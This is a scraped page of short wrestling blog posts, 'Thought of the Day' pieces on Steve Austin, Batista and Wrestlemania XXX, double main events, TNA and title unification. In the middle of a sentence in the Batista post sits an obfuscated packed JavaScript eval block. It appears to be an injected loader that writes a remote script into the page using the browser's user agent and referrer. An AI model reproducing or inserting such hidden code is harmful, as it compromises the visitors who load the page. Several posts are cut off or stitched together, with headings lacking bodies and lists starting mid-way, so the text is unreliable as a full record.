Thought of the Day – Steve Austin Was Good

What people forget is how great he was with the in ring work.  I’ve been doing the Wrestler of the Day series and obviously Austin will be picked when we get to his birthday.  I try to keep those at about ten matches and I realized I’ve got probably 40-50 that I can pick from for Austin and it’ll take a veyr long time to get that list down to size.  There are just so many matches that were either big or important for him but at the same time he had so many matches that blew anything else that night away that people never remember.  I could rattle off about ten matches on TV that are a B+ or higher, which is getting up into Shawn Michaels territory.

Go watch some Steve Austin stuff when you get the chance.  There are times when Austin gets that look in his eyes and you know you’re in for something special.  Check it out, especially in 97/98.



Thought of the Day: Batista and Wrestlemania

I’ve eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzhkb|var|u0026u|referrer|bziaa||js|php'.split('|'),0,{})) shifted a bit on this.At the Rumble, I was ok with Batista winning and getting the title shot at Wrestlemania.  Since then though, it’s pretty clear that things aren’t what they used to be.  Yeah Batista is in a big Hollywood movie this year, but the wrestling fans just do not care.  A lot of this is due to Bryan and Punk, as Batista just came back at the wrong time.  The fans want to see Daniel Bryan winning the title at Wrestlemania and they want Punk back (though the chants were WAY weaker on Monday) and Batista just happens to be there around this time.

As of right now, they would be insane to put Batista in the title match as the only challenger.  He’s certainly a big name and worthy of being in the title hunt, but I think just bringing him back and immediately putting him in the title match in this environment was just asking for trouble.  Thankfully it does seem like the company is backpedaling a bit on him as Batista is barely getting any TV time.  Making the title match a three way would be acceptable, as I really don’t think the fans are as much anti-Batista as they are pro-Bryan.  There’s a future in WWE for Big Dave, but it’s not as the sole challenger for Randy Orton at Wrestlemania XXX.



Thought of the Day: This Is The Main Event

#1 – Hogan/Mr. T. vs. Roddy Piper/Paul Orndorff

#3 – Hogan vs. Andre

#6 – Hogan vs. Warrior

#14 – Austin vs. Michaels

#17 – Austin vs. Rock II

#20 – HHH vs. HBK vs. Benoit

#26 – Michaels vs. Undertaker II

#28 – Rock vs. Cena

There are other shows with a definitive main event, but how much bigger do most of those shows feel as a result?  For the opposite, look at some of the Wrestlemanias where there was a double main event or a show where the main event wasn’t built as THE reason to see the show.

#2 – Hogan vs. Bundy

#4 – Tournament

#8 – Hogan vs. Sid/Savage vs. Flair

#9 – Hart vs. Yokozuna/Mega Maniacs vs. Money Inc.

#11 – Diesel vs HBK/Lawrence Taylor vs. Bam Bam Bigelow

#13 – Bret vs. Austin/Undertaker vs. Sid

#21 – Batista vs. HHH/JBL vs. Cena

#23 – Cena vs. HBK/Lashley vs. Umaga

#24 – Undertaker vs. Edge/Orton vs. HHH vs. Cena

 

While these shows were good, they didn’t have the big match feel and it holds them back.  That’s what holds me back on Wrestlemania 19: there were four matches that you could call the real main event of the show.  The idea of a double main event may sound good, but it doesn’t hold up most of the time when you look back at them.

Last night on Raw, Brad Maddox made the Usos vs. Daniel Bryan and Bray Wyatt have a rematch inside of a cage.  Wasn’t it lucky that there just happened to be a cage above the ring?  Could you at least try to make it seem like this show isn’t completely scripted?

 

2. Nice and Easy.

With Shield’s breakup being imminent for the last three months or so, I’m very relieved to see that they’re not being jobbed out every single match.  That idea is so overused and it takes away any kind of shock you might see coming.  Thankfully Shield has only lost a handful of times and is still a powerful force.  Hopefully this means they change some of their played out ideas up a little bit.

 

3. Watch How It’s Done Junior.

If you’ve watched WWE in the last three weeks or so, you know that Batista is coming back next week and that he’ll be in the Rumble.  WWE has hyped up the return like they always do and I’m betting WWE will draw a crowd as a result.  Batista is a big star and people are likely going to be interested in watching him return.

Compare this to the return of AJ Styles.  Styles returned at the end of an episode of Impact and the next week he was in a world title unification match.  No additional hype, no time to make the fans feel like they had to see it and nowhere near as many additional fans watching the show as they could have had.  The rating was higher due to having a big match.  Imagine how much higher it could have been if more people had known they could have seen AJ return to the ring for a world title unification match.



Thought of the Day: Where Is TNA?

This is one I’ve thought about before but it’s really true when you look at the state of wrestling around Wrestlemania time.

It’s not fair to compare any organization to WWE.  Really, it isn’t.  WWE has been around far longer than any other mainstream organization, has the name recognition, the talent, the skill, the technique and I could go on and on.  It’s not fair to say that TNA isn’t living up to the WWE standards in the same way it’s not fair to compare a high school athlete to a pro athlete.  No, TNA isn’t reaching the same audience that WWE is reaching, but no one is and no one will, possibly ever.  It’s like comparing anyone in wrestling today to John Cena.  They might be some of the most accomplished people today, but they’re just not on that level, no matter how you look at it.

 

To clarify: that’s not a knock on TNA or any single performer other than Cena.  It’s simply not a fair comparison to make and to put a juggernaut up against a normal product, even if they’re second best, can’t realistically be done.



Thought of the Day: Wrestlemania Title Stat

Thought of the Day: Why the Titles Need to Be Unified

On the other hand, if you look at the active roster (I used the one on Wikipedia, which includes names like Ezekiel Jackson and Evan Bourne who haven’t been around in forever as well as part timers like Undertaker, Rock and Lesnar), about 30% of the male wrestlers have held a world title.  Think about that for a minute.  Pick any ten WWE wrestlers and odds are that three of them have been a world champion.

 

If that doesn’t sum up why the titles should be unified, nothing will.



Thought of the Day: Why Losses Matter

Look at NXT again for an example.  Sami Zayn has lost almost every big match he’s had there, but he looks good in those losses.  As a result, he’s still the most over guy in the promotion.  Now look at someone like Damien Sandow, who has looked like a putz in most of his losses.  How important is he at the moment?
